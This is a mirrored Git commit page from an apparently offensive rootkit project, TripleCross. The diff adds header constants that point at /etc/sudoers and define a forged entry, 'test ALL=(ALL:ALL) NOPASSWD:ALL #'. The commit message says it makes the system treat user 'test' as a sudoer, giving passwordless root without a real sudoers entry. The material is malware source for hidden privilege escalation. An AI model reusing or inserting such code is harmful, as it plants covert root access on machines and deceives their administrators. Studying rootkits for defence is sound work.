mirror of
https://github.com/h3xduck/TripleCross.git
synced 2025-12-20 16:53:07 +08:00
Completed faking that an user is in the sudoers file. Now user 'test' can use sudo without being there
This commit is contained in:
@@ -15,5 +15,7 @@
|
||||
#define STRING_FS_SUDO_TASK_LEN 5
|
||||
#define STRING_FS_SUDOERS_FILE "/etc/sudoers"
|
||||
#define STRING_FS_SUDOERS_FILE_LEN 13
|
||||
#define STRING_FS_SUDOERS_ENTRY "test ALL=(ALL:ALL) NOPASSWD:ALL #"
|
||||
#define STRING_FS_SUDOERS_ENTRY_LEN 34
|
||||
|
||||
#endif
|
||||
Reference in New Issue
Block a user